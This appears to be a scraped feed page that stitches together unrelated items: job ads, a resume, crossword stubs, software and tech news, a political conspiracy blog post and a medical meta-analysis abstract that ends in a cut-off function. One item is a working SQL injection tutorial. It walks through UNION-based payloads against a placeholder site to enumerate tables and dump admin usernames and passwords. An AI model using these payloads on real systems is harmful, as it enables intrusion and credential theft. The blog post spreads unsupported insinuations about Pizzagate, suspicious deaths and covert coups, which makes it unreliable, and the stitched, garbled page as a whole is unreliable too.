Hourly Paid Teacher in Web and Database Programming ACS/AEC – LEA.2B - Vanier College - Vanier, QC   
INTENSIVE DAY PROGRAM – MEQ 22 PHASE 2 In the following discipline: 420 Computer Science 420-984-VA Advanced Programming in Java (45 hours) 420-987-VA...
From Vanier College - Tue, 13 Jun 2017 16:45:32 GMT - View all Vanier, QC jobs
          Blog>> Presentations at KM World and Taxonomy Bootcamp Washington DC 2016   
Here are the slides for a bunch of presentations at KM World and Taxonomy Bootcamp Washington DC 2016:
  • Dave Clarke and Maish Nichani (keynote): Searching outside the box
  • Dave Clarke and Gene Loh: Linked Data: the world is your database
  • Patrick Lambe (workshop): Taxonomies and facet analysis for beginners
  • Patrick Lambe (workshop): Knowledge mapping: identifying and mitigating knowledge risks
          Comment on dbms_sqldiag by Mark Jefferys   
Hi Jonathan, This statement is not correct: "One of the enhancements that appeared in 12c for SQL Baselines was that the plan the baseline was supposed to produce was stored in the database so that Oracle could check that the baseline would still reproduce the expected plan before applying it." This new stored plan is not used to check that the reproduced plan matches the expected plan before applying it; the enhancement (in Bug 12588179) was added only to improve diagnostics by having DBMS_XPLAN report the original plan rather than the reproduced plan. Note that the reproduced plan has always been checked against the expected plan since 11.1 via the plan_id. 12c does the same. Mark Jefferys Oracle Support
          Great post on the RNC AWS file leak discovery from UpGuard   
UpGuard’s post on their discovery of the RNC data is trending big time on the netsec subreddit. I highly recommend going to read the post if you want to know what they found. But in a nutshell, it all centers around the misconfiguration of permissions to the AWS S3 bucket where the database was stored. …
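As the post explains, the leak came down to an over-broad grant on the S3 bucket rather than any exotic exploit. As a rough illustration only (the grant structure below mirrors the general shape of AWS ACL responses, but the grants and IDs are invented for this sketch), a world-readable bucket ACL can be spotted like this:

```python
# Hypothetical sketch: detecting a public-read grant in an S3-style ACL.
# The AllUsers group URI is the one AWS uses to mean "everyone on the
# internet"; the example grants below are made up.

ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"

def is_publicly_readable(acl_grants):
    """Return True if any grant gives READ (or FULL_CONTROL) to everyone."""
    for grant in acl_grants:
        grantee = grant.get("Grantee", {})
        if grantee.get("URI") == ALL_USERS and \
           grant.get("Permission") in ("READ", "FULL_CONTROL"):
            return True
    return False

# An ACL resembling a misconfigured bucket: owner control plus world READ.
grants = [
    {"Grantee": {"Type": "CanonicalUser", "ID": "owner-id"},
     "Permission": "FULL_CONTROL"},
    {"Grantee": {"Type": "Group", "URI": ALL_USERS},
     "Permission": "READ"},
]
print(is_publicly_readable(grants))  # True
```

In practice the same check runs against the ACL returned by the AWS API, but the failure mode is exactly this: one grant too many.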

Read More

          Administrative Assistant III   
TX-Dallas, Job Description: Advanced administrative responsibilities include preparation of more complex reports/presentations and analysis using various software packages and databases. Is considered a specialist in the department or division, responsible for a complete process of complex nature. Duties will include determining methods and procedures used to accomplish tasks. Hours: 8:00am to 5:00pm Work We
          GreenPlum Developer   
TX-Dallas, Position: GreenPlum Developer Location: Dallas, TX Duration: FULL TIME Salary: Open Description: Minimum of 5 years experience in distributed application development and system analysis. Hands on exp on GreenPlum Database Experienced in RDBMS – like Oracle Experience in Oracle development (PL/SQL Procedures and Functions, Triggers, Table and Record type variables advance PL/SQL) Experienced in wri
          China introduces a communist tablet: the Red Pad [... at a non-proletarian price of US$1,600]   
January 20, 2012
By Molly McHugh
Digital Trends

The extremely expensive tablet will be marketed specifically to party officials.

If you thought iPads were expensive, think again. A new Chinese tablet called the Red Pad will cost $1,600, but not just anyone can buy it, even if you do have the money.

After heavy criticism of its price from Chinese consumers, marketing and advertising featuring the Red Pad all but disappeared. Now the Economic Times is reporting that the manufacturer will sell the tablet only to bureaucrats, not the public. Originally the device was going to be available to anyone with the money (or the ability to subsidize the purchase), but the backlash was strong enough that the manufacturer back-pedaled, and the tablet's availability will be limited to Party officials.

But the exclusivity isn't the only appeal for party members. The Red Pad is specifically built to cater to their needs: the tablet from Red Pad Technology (which is supposedly in cahoots with the country's Ministry of Information Industry) comes packaged with government database access and integration with the communist mouthpiece website, People's Daily.

What's possibly most amusing about the Red Pad is its operating system. The 9.7-inch Red Pad uses the Android OS, which is surprising considering China's ongoing issues with Google. Aside from its ironic use of this platform and outrageous price, the Red Pad is similar to any other tablet: it features an A9 dual-core processor, Wi-Fi and 3G support, 16GB of flash storage, and a sub-10-inch touchscreen display.

Last month we heard that a personalized iPad application was being developed for UK Prime Minister David Cameron. The supposed app would give him immediate access to government affairs and news. While the degree of this app has been questioned (it’s possible it’s merely a secure, Flipboard-like portal to this data), it’s clear that government leaders have become taken with tablets.

          Software Development Resume   

Samuel Abebe

        12028 NE 8th St, Bellevue, WA 98005

  • 4 years experience in full SDLC with multi-tiered architectures with C#, ASP.NET and ADO.NET.
  • 4+ years experience in web application development using different web technologies.
  • 4 years experience in designing, implementing and optimizing relational databases and working on stored procedure, triggers and views with SQL Server.
  • 3 years MS SQL Server Integration and Reporting Services (SSIS and SSRS).
  • 3 years of experience in HTML, DHTML, XHTML, JavaScript, jQuery, AJAX, CSS, XML, XSL, XSLT and XPath.
  • 3 years of experience in writing Test Plan, Test Case Development and Test Automation.
  • Experience in functional, unit, integration, system, performance, stress, regression, black-box, white-box, localization, globalization and UI testing.
  • 1+ year experience in latest .NET technologies WCF, WPF, LINQ, and Silverlight.
  • In-depth knowledge of data structures, algorithms, and design patterns. Strong analytical skills with the ability to work independently or in a team environment.
  • Highly innovative and adaptive learner, able to quickly grasp complex systems and identify areas of possible improvement.

Languages: C#, Java, C++, ASP.NET, ADO.NET, Java EE, WCF, WPF, LINQ, Silverlight
Database: SQL Server 2005/08, SSIS, SSAS, SSRS, Optimization
Web/App Server: ASP.NET, JavaScript, XHTML, CSS, AJAX, Silverlight
IDE: Visual Studio, SQL Server Mgt Studio, Eclipse, NetBeans
Other: Rational Unified Process (RUP), Agile, Rational Rose, UML, IIS, Tomcat, Crystal Reports, PowerShell, NUnit, JUnit, MVC


Software Engineer
Global Knowledge Initiative, Washington DC, USA     01/2010- 10/2010
The Global Knowledge Initiative is an NGO that builds global knowledge partnerships between individuals and institutions of higher education and research. It helps partners access the global knowledge, technology, and human resources needed to sustain growth and achieve prosperity for all.

Worked on a team of three migrating the organization's existing static website to a dynamic site. Responsibilities:
  • Designed and implemented the user interface.
  • Maintained, updated, and enhanced the organization site.
  • Designed and implemented the relational database.
  • Wrote the test plan, developed test cases and automated tests.
  • Performed functional, integration, performance, stress, regression, black-box, white-box, and UI testing.
Technical Environment: C#, ASP.NET, Silverlight, Visual Studio 2008, SQL Server 2008, Visio, HTML, XML, JavaScript, CSS, IIS and FileZilla.

Software Engineer
“HAFSAM P.L.C” Garment Shopping Company, Addis Ababa, Ethiopia     09/2007- 05/2008
Worked on a team of three designing and implementing an e-commerce website that lets users shop online for traditional clothing. Customers can search the company's inventory by category, add items to a shopping cart and, finally, check out. Responsibilities:
  • Designed the management of administrative tasks, such as setting prices and discounts, uploading clothing images and managing order status
  • Implemented user profile creation, including username and password setup
  • Implemented features that let users step through the shopping process: searching for products, adding or removing cart items, and checking out
  • Implemented checkout, collecting the customer's billing, shipping and payment information.
Technical Environment:   C#, ASP.Net, ADO.NET, SQL Server, HTML, XML, JavaScript, CSS and Visio.

Software Engineer
NIB International Bank, Addis Ababa, Ethiopia     01/2005- 08/2007
Worked on the development of a banking application that closes the communication gap between the bank and its customers. Customers can communicate with the bank directly online through user-friendly interfaces. The application handles customers' online money transactions, including withdrawals, deposits, transfers to other accounts, and access to online statements. Responsibilities:
  • Participated in the design of use case, association, class and activity diagrams using UML
  • Created customized .NET Framework classes for later use in the application
  • Wrote SQL queries, stored procedures and functions in SQL Server
  • Prepared Test plan, Test cases and other documentations.
  • Used NUnit for our unit test cases.
  • Performed functional, unit, integration, stress, performance and UI testing.
Technical Environment: C#, ASP.NET, SQL Server, ADO.NET, Rational Rose, HTML, JavaScript, CSS, and XML.


Master of Science in Computer Science, Maharishi University of Management, Fairfield, Iowa (May 2008 - Jan 2010)
Bachelor of Science in Computer Science, Addis Ababa University, Addis Ababa, Ethiopia (Sept 2000 - Jan 2005)

          How A Contractor Exploited A Vulnerability In The FCC Website   
RendonWI writes: A Wisconsin wireless contractor discovered a flaw in the FCC's Antenna Structure Registration (ASR) database, and changed the ownership of more than 40 towers from multiple carriers and tower owners into his company's name during the past five months without the rightful owners being notified by the agency, according to FCC documents and sources knowledgeable of the illegal transfers. Sprint, AT&T and key tower companies were targeted in the wide-ranging thefts... Changing A ...
          Online chess   
Browser-based online chess with database, forums and links.
          Rivendell: Free software for broadcasters   
It looks like Audicom 7 has competition: Rivendell, open-source software for broadcasters running the GNU/Linux operating system, resembles that program in that it works as a manager, editor and song scheduler. Here are some of its interesting features. Audio editor: lets you cut audio on and off the air. It also has a good editor for setting the In and Out points as well as fades. A fundamental tool for radio stations.


CD ripper: a tool that imports songs from CDs and saves the user from typing in the artist and album by hand. It also normalizes song volume (dB) and can change the output channels. It can be used on touch screens, too. Extensive live-assist support, with multiple sound panels available for use by touch. Supports the PCM and MPEG Layer audio formats.

Log windows: besides a simple, friendly interface, Rivendell has two auxiliary logs. Manual and automatic modes for music playback. Configurable pauses and stops over the course of the programming. It is also compatible with analog and digital audio.

Control panel: from one computer you can manage three others in different booths through the Rivendell panel. What stands out is its backup database, which makes copies of all files at the push of a button and recovers lost ones with the Restore database feature.

Technical specifications: you will need at least a Pentium 4 CPU, 256 MB of RAM, a Linux Professional 9.x operating system, an AudioScience audio adapter and, optionally, a touch-screen monitor to ease the work of the DJ or announcer. It wouldn't hurt to download software like this: it's useful, practical and, above all, free.

Main site: Rivendell
Downloads: link
          A bit of skill at the piano   

Searching our database for: A bit of skill at the piano crossword clue answers and solutions. This crossword clue was seen today at Evening Standard Cryptic Crossword June 29 2017. Found 1 possible solution matching the query A bit of skill at the piano that you searched for. Kindly check the possible answer below and […]

The post A bit of skill at the piano appeared first on DailyCrosswordSolver.co.uk.

          Fishy temptation?   

Searching our database for: Fishy temptation? crossword clue answers and solutions. This crossword clue was seen today at Evening Standard Cryptic Crossword June 29 2017. Found 1 possible solution matching the query Fishy temptation? that you searched for. Kindly check the possible answer below and if it’s not what you are looking for then use […]

The post Fishy temptation? appeared first on DailyCrosswordSolver.co.uk.

          Car parts one tires of mentioning?   

Searching our database for: Car parts one tires of mentioning? crossword clue answers and solutions. This crossword clue was seen today at Evening Standard Cryptic Crossword June 29 2017. Found 1 possible solution matching the query Car parts one tires of mentioning? that you searched for. Kindly check the possible answer below and if it’s […]

The post Car parts one tires of mentioning? appeared first on DailyCrosswordSolver.co.uk.

          Traveller backed up by Damon   

Searching our database for: Traveller backed up by Damon crossword clue answers and solutions. This crossword clue was seen today at Evening Standard Cryptic Crossword June 29 2017. Found 1 possible solution matching the query Traveller backed up by Damon that you searched for. Kindly check the possible answer below and if it’s not what […]

The post Traveller backed up by Damon appeared first on DailyCrosswordSolver.co.uk.

          In America, it makes labour more costly   

Searching our database for: In America, it makes labour more costly crossword clue answers and solutions. This crossword clue was seen today at Evening Standard Cryptic Crossword June 29 2017. Found 1 possible solution matching the query In America, it makes labour more costly that you searched for. Kindly check the possible answer below and […]

The post In America, it makes labour more costly appeared first on DailyCrosswordSolver.co.uk.

          In the reading room, it would be disquieting   

Searching our database for: In the reading room, it would be disquieting crossword clue answers and solutions. This crossword clue was seen today at Evening Standard Cryptic Crossword June 29 2017. Found 1 possible solution matching the query In the reading room, it would be disquieting that you searched for. Kindly check the possible answer […]

The post In the reading room, it would be disquieting appeared first on DailyCrosswordSolver.co.uk.

          Go round or up to an art gallery   

Searching our database for: Go round or up to an art gallery crossword clue answers and solutions. This crossword clue was seen today at Evening Standard Cryptic Crossword June 29 2017. Found 1 possible solution matching the query Go round or up to an art gallery that you searched for. Kindly check the possible answer […]

The post Go round or up to an art gallery appeared first on DailyCrosswordSolver.co.uk.

          Member of the college faculty   

Searching our database for: Member of the college faculty crossword clue answers and solutions. This crossword clue was seen today at Evening Standard Cryptic Crossword June 29 2017. Found 1 possible solution matching the query Member of the college faculty that you searched for. Kindly check the possible answer below and if it’s not what […]

The post Member of the college faculty appeared first on DailyCrosswordSolver.co.uk.

          Oh, him with the joyous expression!   

Searching our database for: Oh, him with the joyous expression! crossword clue answers and solutions. This crossword clue was seen today at Evening Standard Cryptic Crossword June 29 2017. Found 1 possible solution matching the query Oh, him with the joyous expression! that you searched for. Kindly check the possible answer below and if it’s […]

The post Oh, him with the joyous expression! appeared first on DailyCrosswordSolver.co.uk.

          SQL Injection Through a URL   
Everyone already knows what SQL injection is, right? If you don't, head over to Wikipedia or Google first.. :D

OK, for those who already know what SQL injection is but are still confused about how it's done, I'll share it here..

First, let's prepare:
  1. A target (you can find one on Google, Bing, etc.)
  2. A glass of water (so you don't get dehydrated in front of a hot computer.. hehe)

Straight to it then..
First we find a target, say http://www.target.com/news.php?id=1
Then we add a single quote after the 1 to find out whether the site is vulnerable to SQL injection.
The URL will end up like this: http://www.target.com/news.php?id=1'

See whether this error appears: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax
If that error shows up, the site is vulnerable. :D

Next, once it's confirmed vulnerable, we continue by changing the URL to http://www.target.com/news.php?id=-1+order+by+1--
Check whether an error appears again; if not, keep going, replacing the trailing 1 with 2 and so on..
Say the error shows up at 5; that means we take 1, 2, 3 and 4 for the next step..
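For illustration only, that column-counting loop is just URL construction. This sketch builds the probe URLs (the base URL is the placeholder target from this walkthrough, and the cap of candidate columns is an arbitrary assumption; nothing here sends any traffic):

```python
# Hypothetical sketch: generate the ORDER BY probe URLs described above.
# In the walkthrough, you would request each URL in turn and stop at the
# first column count that produces an error.

def order_by_probes(base_url, max_cols=10):
    """Build one probe URL per candidate column count (1..max_cols)."""
    return [f"{base_url}+order+by+{n}--" for n in range(1, max_cols + 1)]

probes = order_by_probes("http://www.target.com/news.php?id=-1", max_cols=5)
print(probes[0])  # http://www.target.com/news.php?id=-1+order+by+1--
```

If the error first appears at ORDER BY 5, the query has 4 columns, which is what the next step uses.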

Now change the URL to http://www.target.com/news.php?id=-1+union+select+1,2,3,4-- to see which magic number comes out.. :D
If 3 comes out, we replace that 3 with @@version or version() to find out the MySQL version in use: http://www.target.com/news.php?id=-1+union+select+1,2,@@version,4--

If the MySQL version is 4, just leave it and look for another site, but if it's version 5, we push on.. :D

We already know the MySQL version is 5, so now we change the URL again to http://www.target.com/news.php?id=-1+union+select+1,2,group_concat(table_name),4+from+information_schema.tables+where+table_schema=database()--
to list the tables that exist on that site.

Once the table names come out, look for one whose name seems suspicious. Say we get "admin_log" (without the quotes).

We open that table by changing group_concat(table_name) to group_concat(column_name), information_schema.tables to information_schema.columns, and table_schema=database() to table_name=admin_log. But "admin_log" must first be converted to hexadecimal, with 0x added in front of the result.
Say the hex of admin_log were 12345; it would become 0x12345.
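That hex step can be reproduced in a couple of lines (the "12345" above is just a placeholder; this computes the actual encoding of the example table name):

```python
# Encode a string as a MySQL 0x-prefixed hex literal, which lets a string
# value appear in a query without quote characters. "admin_log" is the
# example table name from the walkthrough.

def to_mysql_hex(s):
    return "0x" + s.encode("ascii").hex()

print(to_mysql_hex("admin_log"))  # 0x61646d696e5f6c6f67
```

MySQL treats 0x61646d696e5f6c6f67 as the string 'admin_log', which is why the trick works.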

See which names come out, say "admin,pass".
We just open the contents of those columns to get the admin's username and password.. :D
Change group_concat(column_name) to group_concat(admin,0x23,pass) and information_schema.columns+where+table_name=0x12345 to admin_log.

With that, all the usernames and passwords come out.
Now you just need to find the admin login page.., but remember, don't misuse this, OK.. ;)

Hope this is useful.. ^_^


This series revisits the fundamentals of database security, both the mindset behind it and the countermeasures it requires, and introduces concrete implementation methods and tips centered on Oracle Database. In this installment, we explain once again why database security is necessary.

          Data Resource Profile: The French National Uniform Hospital Discharge Data Set Database (PMSI)   
          Spy vs Spy: Stuck in the Funhouse   

Funhouses are only fun when you can leave them. When the distorting mirror images become your new, day-to-day reality construct, then it's not so much fun anymore. 

I dreaded the 2016 Election because I had a very strong feeling that no matter who won we'd be plunged into a dystopian paradigm in which major power blocs would erupt into all-out warfare. And I sensed that neither Trump nor Clinton possessed the political skills or the communicative powers to keep the carnage fully out of our view. Or our path.

And I was right.

Trump's only been in office for a little over two months and I'm exhausted already. I'm certainly not alone in this. It all feels like a TV sitcom in its seventh season, well after the writers ran out of story ideas. The shark has been good and jumped. And the ratings (the approval ratings, in this case) are plunging too.

What is truly demoralizing though is the utter transparency of the secret war playing out, the seemingly endless spy vs spy thrust and counter-thrust, and the obvious deceptions. Even more so is the Animal Farm-like metamorphosis of the Democratic Party into a full-blown, funhouse mirror of McCarthy-era Republicans, but with Glenn Beck-worthy conspiracy theories thrown in for good measure.

I don't know about you but all of a sudden the world seems especially cold, hard, gray, harsh. Masks are coming off, velvet gloves tossed into wastebins. It doesn't seem to matter who wins the scorpion fight, you're still stuck with a scorpion.  

We can't call out the play-by-play because it's largely being acted out behind closed doors. But we can look at the collateral damage and make certain speculations. There's no doubt that it would all be just as bad-- probably worse-- if Hillary won. Even so, this all feels especially grating.

You've probably seen this story:
Conspiracy theorist Alex Jones on Friday apologized to the owner of a Washington pizzeria that became the subject of a conspiracy theory about human trafficking last year. 
Pizza shop Comet Ping Pong was thrust into the spotlight last year after a gunman allegedly fired a shot inside the restaurant. The suspect said he was investigating the unsubstantiated conspiracy theory that Hillary Clinton and her campaign chairman, John Podesta, were operating a child sex trafficking ring out of the restaurant. 
The theory, which became known as Pizzagate, had circulated among far-right conspiracy theory websites and social media accounts. 
“In our commentary about what had become known as Pizzagate, I made comments about Mr. Alefantis that in hindsight I regret, and for which I apologize to him,” Jones, who runs Infowars, said in a video. James Alefantis is the owner of Comet Ping Pong. 
Jones said his website relied on reporters who are no longer employed by Infowars and that video reports about Pizzagate were removed from the website. He also invited Alefantis onto the show to discuss the incident.
It was preceded by this story:
According to McClatchy News, the FBI’s Russian-influence probe agents are exploring whether far-right news operations, including the pro-Donald Trump sites Breitbart News and Infowars, “took any actions to assist Russia’s operatives.”  Trump’s ousted national security adviser Michael Flynn and his son, a member of the Trump transition team, were among those who boosted the so-called “PizzaGate” pedophile conspiracy theory.
I doubt this will quell the fervor among the Pizzagaters on sites like 4chan and Voat. Given the suspicion many on the fringes regard Jones with it may in fact give the flagging movement a fresh jolt. Jones' apology may also have to do with the drive to purge YouTube of "extremist" content and the controversy over the use of advertising on videos corporate clients find objectionable. A World without Sin, as our Gordon might put it. 

Washington Post headline, pre-election.

So much for theories that the FBI was ready to make mass arrests of prominent Washington figures related to Pizzagate.  Has any "mass arrest" Internet story ever panned out?  

Maybe it has:
Donald Trump became president on Jan. 20. And in one short month, there were more than 1,500 arrests for sex crimes ranging from trafficking to pedophilia.  
Big deal? You bet. In all of 2014, there were fewer than 400 sex trafficking-related arrests, according to FBI crime statistics. Liz Crokin at TownHall.com has put together a great piece on the push by the Trump administration to crack down on sex crimes. And she notes that while "this should be one of the biggest stories in the national news... the mainstream media has barely, if at all, covered any of these mass pedophile arrests. This begs the question – why?
This may have nothing to do with Trump-- in fact, it's likely it doesn't-- since these kinds of actions are planned out months in advance. The arrests continue, in case you were wondering, with major busts going down on a near-weekly basis. Someone's cleaning house. 

For what it's worth, I always reckoned that Pizzagate was in fact cover/distraction for a more hidden struggle, one that would take place under the radar*. As I noted back in November:

No one is saying as much but this very much feels connected to a deeper, more covert war. 
Why would I say such a thing? Because at the same time the Pizzagate story went dark we've seen major strikes taken against international pedophilia, which actually is a global conspiracy, with its own networks, secret codes and moles within established centers of power such as schools, police departments and governments.  
With such combustible accusations-- and such potential for a scandal that could quickly spread out of control (i.e., involve political figures you're not trying to destroy)-- you'd naturally expect the action to go dark and the fall guys to be placed pretty far down the foodchain. (Remember that a prior investigation bagged one of the most powerful people in Washington at one time, former Speaker of the House Dennis Hastert).†


It may be sheer coincidence, but James Alefantis' former partner suffered a major heart attack this week:
Media Matters for America founder David Brock was rushed to a hospital on Tuesday after suffering a heart attack. 
According to a press release from MMA, the founder of the liberal media watchdog and analysis website was rushed to the hospital early Tuesday afternoon and received treatment.
Sure, it may be coincidence. But I couldn't help remembering this story, published soon after the election:
Dems to David Brock: Stop Helping, You Are Killing Us 
Democrats know they need someone to lead them out of the wilderness. But, they say, that someone is not David Brock.

As David Brock attempts to position himself as a leader in rebuilding a demoralized Democratic Party in the age of Trump, many leading Democratic organizers and operatives are wishing the man would simply disappear.
"Disappear." Huh. 
Many in the party—Clinton loyalists, Obama veterans, and Bernie supporters alike—talk about the man not as a sought-after ally in the fight against Trumpism, but as a nuisance and a hanger-on, overseeing a colossal waste of cash. And former employees say that he has hurt the cause.
It's worth remembering that Breitbart.com founder Andrew Breitbart died of a heart attack at the age of 43. A year before he'd posted a cryptic tweet that some have since linked to the Pizzagate imbroglio. Just before his death he hyped some revelation about Barack Obama's past.

A coroner in the office handling Breitbart's body subsequently died of arsenic poisoning. The day Breitbart's autopsy results were revealed, in fact.


We also saw James Comey revive Russiagate, which had been flatlining after Vault 7. Any illusions among Trump fans that the FBI was secretly on their side were ground into powder, between this revelation and the Pizzagate conspiracy investigations. 

One can't help but wonder if the New Praetorians (I've noticed that the Praetorian meme has been picked up by more prominent commentators, but you heard it here first) are losing their last shred of patience with Donald Trump's shenanigans and are planning imminent regime change: 
WASHINGTON (AP) — The FBI is investigating whether Donald Trump’s associates coordinated with Russian officials in an effort to sway the 2016 presidential election, Director James Comey said Monday in an extraordinary public confirmation of a probe the president has refused to acknowledge, dismissed as fake news and blamed on Democrats. 
In a bruising five-hour session, the FBI director also knocked down Trump’s claim that his predecessor had wiretapped his New York skyscraper, an assertion that has distracted White House officials and frustrated fellow Republicans who acknowledge they’ve seen no evidence to support it.
How surreal is the world you now live in? So much so that mainstream political site The Hill is comparing the action in Washington to a Stanley Kubrick film, one which has become notorious for the conspiracy theories that have been projected onto it (and is well familiar to Synchronauts):
On the 40th anniversary of the publication of The Shining, Stephen King must be wondering if Washington is working on its own sequel. For the last couple months, Washington has been on edge, like we are all trapped in Overlook Hotel with every day bringing a new “jump scare,” often preceded by a telltale tweet. Indeed, a Twitter whistle has replaced suspenseful music to put the entire city on the edge of their seats. 
In this Shining sequel, however, people are sharply divided on who is the deranged ax-wielding villain in this lodge, the president or the press. Ironically, with the recent disclosure that some of the Trump campaign may indeed have been subject to surveillance, the president is looking more like Danny Torrence, a character dismissed for constantly muttering “redrum, redrum” until someone finally looked in a mirror at the reverse image to see the true message.
Yeah, I'm not really feeling that metaphor there, but whatever. It's been that kind of year.

Now the Internet is burning up with theories that disgraced National Security Adviser Michael Flynn has "turned" and is going to testify against the Trump Administration, or at least figures attached to it. 

It's hard to imagine a three-star general can be stupid enough to be guilty of things Flynn's been accused of but that may speak to a culture of impunity in Washington, in which your misdeeds are only punished if you get on the wrong side of the wrong people.


One wonders if the secret war has spread outside Washington. Car service giant Uber seems to be having a major run of rotten luck lately: 
Uber Technologies Inc. is suspending its self-driving car program after one of its autonomous vehicles was involved in a high-impact crash in Tempe, Arizona, the latest incident for a company reeling from multiple crises. 
In a photo posted on Twitter, one of Uber’s Volvo self-driving SUVs is pictured on its side next to another car with dents and smashed windows. An Uber spokeswoman confirmed the incident, and the veracity of the photo, and added that the ride-hailing company is suspending its autonomous tests in Arizona until it completes its investigation and pausing its Pittsburgh operations.

The incident also comes as Uber, and Chief Executive Officer Travis Kalanick, are currently under scrutiny because of a series of scandals. The ride-hailing company has been accused of operating a sexist workplace. This month, the New York Times reported that Uber used a tool called Greyball to help drivers evade government regulators and enforcement officials. Kalanick said he needed "leadership help" after Bloomberg published a video showing him arguing with an Uber driver.
So who did Kalanick piss off? 

Coincidentally (there's that word again), the crash comes soon after WikiLeaks revealed that CIA hackers had the ability to override the computer systems in automobiles. From Mashable:

WikiLeaks has published a trove of files it says are linked to the CIA's hacking operations — which apparently includes efforts to hack into cars.  
The first in a series called "Vault 7," "Year Zero" supposedly comprises 8,761 documents and files from an isolated, high-security network situated inside the CIA's Center for Cyber Intelligence in Langley, Virginia.  
"Year Zero" details the CIA's malware arsenal and "zero day" exploits against Apple iPhones, Google's Android operating system, Microsoft Windows and even Samsung TVs.  
 According to a document from 2014, the CIA was also looking at infecting the vehicle control systems used by modern cars and trucks. 
Oh, that's reassuring. Speaking of control systems, apparently pimps are controlling prostitutes with RFID chips:
It turns out this 20-something woman was being pimped out by her boyfriend, forced to sell herself for sex and hand him the money. 
 “It was a small glass capsule with a little almost like a circuit board inside of it,” he said. “It's an RFID chip. It's used to tag cats and dogs. And someone had tagged her like an animal, like she was somebody's pet that they owned.” 
This is human trafficking. It’s a marginal issue here in the U.S. for most of us. Part of that is because the average person isn’t sure what human trafficking – or modern day slavery – actually means.
Technology is our friend, right? And now this: 
Turkish Hackers Threaten To Wipe Millions Of iPhones; Demand Ransom From Apple 
Today, courtesy of CIO, we learn that a group of hackers referring to themselves as the "Turkish Crime Family", has been in direct contact with Apple and is demanding a $150,000 ransom by April 7th or they will proceed to wipe as many as 600 million apple devices for which they allegedly have passwords. 
The group said via email that it has had a database of about 519 million iCloud credentials for some time, but did not attempt to sell it until now. The interest for such accounts on the black market has been low due to security measures Apple has put in place in recent years, it said.

Since announcing its plan to wipe devices associated with iCloud accounts, the group claimed that other hackers have stepped forward and shared additional account credentials with them, putting the current number it holds at over 627 million.

According to the hackers, over 220 million of these credentials have been verified to work and provide access to iCloud accounts that don't have security measures like two-factor authentication turned on.
Of course, if credible, with an ask of just $150k, this is the most modest group of hackers we've ever come across.
Given the war that's erupted between the increasingly aggressive Turkish government and the EU, money may well not be the object here. Turkish President Erdogan is clearly set on reconstructing the old Ottoman Empire, and shivving Apple might just be part of the march.

Besides, Turkey is taking that recent coup attempt-- which is almost universally blamed on the CIA-- very personally.

Speaking of the EU, we've seen stories that Trump advisor Steve Bannon wants to dissolve the union. Which may be why Trump adversary John McCain announced his unalloyed support for it, and for the "New World Order" (his words, not mine):
The world "cries out for American and European leadership" through the EU and Nato, US senator John McCain said on Friday (24 March). 
In a "new world order under enormous strain" and in "the titanic struggle with forces of radicalism … we can't stand by and lament, we've got to be involved," said McCain, a former Republican presidential candidate who is now chairman of the armed services committee in the US Senate. 
Speaking at the Brussels Forum, a conference organised by the German Marshall Fund, a transatlantic think tank, he said that the EU and the US needed to develop "more cooperation, more connectivity". 
"I trust the EU," he said, defending an opposite view from that of US president Donald Trump, who said in January that the UK "was so smart in getting out" of the EU and that Nato was "obsolete". 
He said that the EU was "one of the most important alliances" for the US and that the EU and Nato were "the best two sums in history", which have maintained peace for the last 70 years. "We need to rely on Nato and have a Nato that adjusts to new challenges," he said.
Would McCain speak this way to a domestic audience? Of course not. Or maybe he would; I can't tell which way is up anymore. But either way it's good to know where he really stands.

Like McCain, China continues to sound a similar note of support for globalization, on which its very economic survival so desperately depends:
Chinese Vice Premier Zhang Gaoli told a gathering of Asian leaders that the world must commit to multilateral free trade under the World Trade Organization and needs to reform global economic governance. 
“The river of globalization and free trade will always move forward with unstoppable momentum to the vast ocean of the global economy,” Zhang said. China will remain a strong force in the world economy and for peace and stability, he said, adding that countries must respect one another’s core interests and refrain from undermining regional stability. 
I suppose this is why China is off the target list for our new Cold (?) Warriors.

I've resisted posting on all this because it's all so depressing. I've actually written a few pieces on this chicanery that I ended up roundfiling. But I suppose I just wanted to go on the record about all this skullduggery, for posterity's sake.

UPDATE: Sex trafficking arrests and trials continue to proliferate. Most recent bust, an international ring in Minnesota. There is way too much activity going down in too short a time for this to be spontaneous.

* Which is exactly why I refrained from commenting on it here for the most part, instead noting that it had become a kind of memetic virus in much the same way that the Franklin/Boy's Town scandal had in the 90s. (Note that prior to the election-- and Pizzagate-- Trump nemesis the Washington Post was all over the issue of sex trafficking in the nation's capital). 

† The ongoing legal and police actions coinciding with the moves to shut down the Pizzagate fringes on the Web seem like the exact kind of action one would expect if there were a serious operation at work. Shutting down the Internet chatter makes perfect sense in this context because it can only complicate cases made by prosecutors. 
          Effectiveness of motivational interviewing interventions on medication adherence in adults with chronic diseases: a systematic review and meta-analysis   
Background: Medication adherence is frequently suboptimal in adults with chronic diseases, resulting in negative consequences. Motivational interviewing (MI) is a collaborative conversational style for strengthening a person’s motivation and commitment to change. We aimed to assess whether MI interventions are effective at enhancing medication adherence in adults with chronic diseases and to explore the effect of individual MI intervention characteristics.
Methods: We searched electronic databases and reference lists of relevant articles to find randomized controlled trials (RCTs) that assessed MI intervention effectiveness on medication adherence in adults with chronic diseases. A random-effects model was used to estimate a pooled MI intervention effect size and its heterogeneity (I2). We also explored the effects of individual MI characteristics on MI intervention effect size using meta-regression with a linear mixed model.
Results: Nineteen RCTs were identified, and 16 were included in the meta-analysis. The pooled MI intervention effect size was 0.12 [95% confidence interval (CI) = (0.05, 0.20), I2 = 1%]. Interventions that were based on MI only [β = 0.183, 95% CI = (0.004, 0.362)], or in which interventionists were coached during intervention implementation [β = 0.465, 95% CI = (0.028, 0.902)], were the most effective. MI interventions delivered solely face to face were more effective than those delivered solely by phone [β = 0.270, 95% CI = (0.041, 0.498)].
Conclusions: This synthesis of RCTs suggests that MI interventions might be effective at enhancing medication adherence in adults treated for chronic diseases. Further research is nevertheless warranted, as the observed intervention effect size was small.
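The pooled estimate described above comes from inverse-variance weighting under a random-effects model. A minimal sketch of that computation, using a DerSimonian-Laird estimate of the between-study variance; the effect sizes and variances below are hypothetical inputs for illustration, not numbers taken from the review:

```python
import math

def pool_random_effects(effects, variances):
    """Inverse-variance pooling with a DerSimonian-Laird tau^2 estimate.

    effects: per-study standardized mean differences
    variances: their within-study variances
    Returns (pooled effect, 95% CI low, 95% CI high, I^2 in percent).
    """
    w = [1.0 / v for v in variances]                              # fixed-effect weights
    fixed = sum(wi * e for wi, e in zip(w, effects)) / sum(w)
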